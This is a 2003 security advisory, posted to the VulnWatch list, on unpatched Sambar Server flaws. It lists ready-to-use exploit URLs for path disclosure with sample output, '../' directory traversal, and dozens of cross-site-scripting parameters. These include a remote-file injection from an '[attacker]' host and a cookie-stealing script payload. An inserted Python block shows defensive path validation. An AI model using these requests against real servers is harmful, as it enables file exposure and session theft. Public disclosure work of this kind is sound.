[VulnWatch] [SCSA-012] Multiple vulnerabilities in Sambar Server

From: Gregory Le Bras | Security Corporation (gregory.lebras@security-corporation.com)
Date: 03/27/03

    From: "Gregory Le Bras | Security Corporation" <gregory.lebras@security-corporation.com>
    To: <vulnwatch@vulnwatch.org>
    Date: Thu, 27 Mar 2003 15:25:40 +0100
    
    

    ________________________________________________________________________

    Security Corporation Security Advisory [SCSA-012]
    ________________________________________________________________________

    PROGRAM: Sambar Server
    HOMEPAGE: http://www.sambar.com/
    VULNERABLE VERSIONS: 5.3 and prior
    ________________________________________________________________________

    DESCRIPTION
    ________________________________________________________________________

    "Sambar Server is the new standard in high performance multi-functional
    servers with features rivaling other commercial products selling
    separately for several hundreds of dollars. It's Winsock2 compliant Win32
    integration functions on Windows 95, Windows 98, Windows NT, Win2000,
    and XP as a service or as an application."
    (direct quote from http://sambar.jalyn.net)

    DETAILS & EXPLOITS
    ________________________________________________________________________

    ¤ Path Disclosure :

    Sambar's default installation ships a testcgi.exe and an environ.pl in
    the CGI bin directory. Both scripts echo their CGI environment, which
    lets remote users view information about the operating system and
    the web server's directory layout.

    These vulnerabilities can be triggered by a remote user submitting
    a specially crafted HTTP request.

    - Exploits :

    http://[target]/cgi-bin/environ.pl

    http://[target]/cgi-bin/testcgi.exe

    Will produce the following output:

    - environ.pl :
    --------------

    Sambar Server CGI Environment Variables
    GATEWAY_INTERFACE: CGI/1.1
    PATH_INFO:
    PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl
    QUERY_STRING:
    REMOTE_ADDR: 127.0.0.1
    REMOTE_HOST:
    REMOTE_USER:
    REQUEST_METHOD: GET
    DOCUMENT_NAME: environ.pl
    DOCUMENT_URI: /cgi-bin/environ.pl
    SCRIPT_NAME: /cgi-bin/environ.pl
    SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl
    SERVER_NAME: localhost
    SERVER_PORT: 80
    SERVER_PROTOCOL: HTTP/1.1
    SERVER_SOFTWARE: SAMBAR
    CONTENT_LENGTH: 0
    CONTENT:

    - testcgi.exe :
    ---------------

    Test CGI ... Version 1.00 [ build date 8-03-97 ]

    QUERY_STRING
    PATH_INFO
    PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe
    SCRIPT_NAME /cgi-bin/testcgi.exe
    SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe
    DOCUMENT_ROOT C:/sambar53/docs/
    HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
    REMOTE_ADDR 127.0.0.1
    REMOTE_HOST
    SERVER_NAME localhost
    SERVER_PROTOCOL HTTP/1.1
    SERVER_SOFTWARE SAMBAR
    CONTENT_TYPE

    ----------------------------

    ¤ Directory Disclosure :

    Other security vulnerabilities were found in Sambar which allow an
    attacker to reveal the contents of files and directories on the web
    server, even where they should not be exposed.

    These vulnerabilities can be exploited simply by requesting a
    specially crafted URL for the iecreate.stm and ieedit.stm
    applications with '../' appended.

    - Exploits :

    http://[target]/sysuser/docmgr/iecreate.stm?template=../

    http://[target]/sysuser/docmgr/ieedit.stm?url=../
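The traversal above works because a user-supplied template/url parameter is joined to the document root without checking where the result ends up. The following is an added example (not Sambar's code, which is not public) of the check a server-side handler should apply before opening such a path: decode, normalise separators, resolve the path and refuse anything that does not land strictly inside the document root. The document root value is taken from the testcgi.exe output above; the function name and the choice to treat paths with forward slashes (as Sambar reports them) are assumptions of this example.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Document root as reported by testcgi.exe in the advisory (DOCUMENT_ROOT),
# without the trailing slash. Sambar reports its paths with forward slashes.
DOC_ROOT = "C:/sambar53/docs"


def resolve_under_root(doc_root: str, requested: str) -> Optional[str]:
    """Map a user-supplied 'template' / 'url' style parameter to a file path.

    Returns the normalised path inside doc_root, or None when the request
    would escape the root (the '../' case in the advisory), is absolute,
    or carries a NUL byte. Hypothetical helper written for this example.
    """
    # The web server normally decodes the query once; decoding here as well
    # keeps the check correct if a caller passes the raw parameter.
    decoded = unquote(requested)
    if "\x00" in decoded:
        return None
    # Treat Windows separators like '/' so '..\\' cannot bypass the check.
    decoded = decoded.replace("\\", "/")
    # Only relative names are acceptable: no leading '/' and no drive letter.
    if decoded.startswith("/") or (len(decoded) > 1 and decoded[1] == ":"):
        return None
    root = posixpath.normpath(doc_root)
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    # Require the resolved path to be strictly inside the root directory.
    if not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for name in ("index.htm", "../", "sub/../../x.htm", "..%2f..%2fboot.ini"):
        print(f"{name!r:28} -> {resolve_under_root(DOC_ROOT, name)}")
```

The check is done on the normalised result rather than by searching the input for "../", so encoded, doubled or backslash variants are handled by the same comparison. Comparing against `root + "/"` avoids the classic mistake where a sibling directory such as `C:/sambar53/docs-old` would pass a plain prefix test.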

    ----------------------------

    ¤ Cross Site Scripting :

    Many exploitable bugs were found in Sambar Server that cause script
    execution on the client's computer when a crafted URL is followed.

    This kind of attack, known as a "Cross-Site Scripting Vulnerability", is
    present in many sections of the web site; an attacker can inject
    specially crafted links and/or other malicious scripts.

    - Exploits :

    http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]

    http://[target]/netutils/whodata.stm?sitename=[hostile_code]

    http://[target]/netutils/findata.stm?user=[hostile_code]

    http://[target]/netutils/findata.stm?host=[hostile_code]

    http://[target]/isapi/testisa.dll?check1=[hostile_code]

    http://[target]/cgi-bin/environ.pl?param1=[hostile_code]

    http://[target]/samples/search.dll?query=[hostile_code]&logic=AND

    http://[target]/wwwping/index.stm?wwwsite=[hostile_code]

    http://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456

    http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]

    http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]

    http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]

    http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]

    http://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]

    http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]

    http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/create.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/info.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/info.stm?name=[hostile_code]

    http://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]

    http://[target]/sysuser/docmgr/search.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/search.stm?query=[hostile_code]

    http://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/sendmail.stm?name=[hostile_code]

    http://[target]/sysuser/docmgr/template.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/update.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/update.stm?name=[hostile_code]

    http://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code]

    http://[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code]

    http://[target]/sysuser/docmgr/vchist.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code]

    http://[target]/cgi-bin/testcgi.exe?[hostile_code]

    - Another Cross Site Scripting can be exploited with a remote file
    that includes the hostile code, like this :

    http://[target]/sysuser/docmgr/ieedit.stm?url=http://[attacker]/hostile_file.htm

    The hostile code could be :

    [script]alert("Cookie="+document.cookie)[/script]

    (opens a window showing the visitor's cookie.)

    (replace [] by <>)

    SOLUTIONS
    ________________________________________________________________________

    No solution for the moment.

    VENDOR STATUS
    ________________________________________________________________________

    The vendor has reportedly been notified.

    LINKS
    ________________________________________________________________________

    - http://www.security-corp.org/index.php?ink=4-15-1

    - Version Française :
    http://www.security-corporation.com/index.php?id=advisories&a=012-FR

    ------------------------------------------------------------------------
    Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com
    ------------------------------------------------------------------------

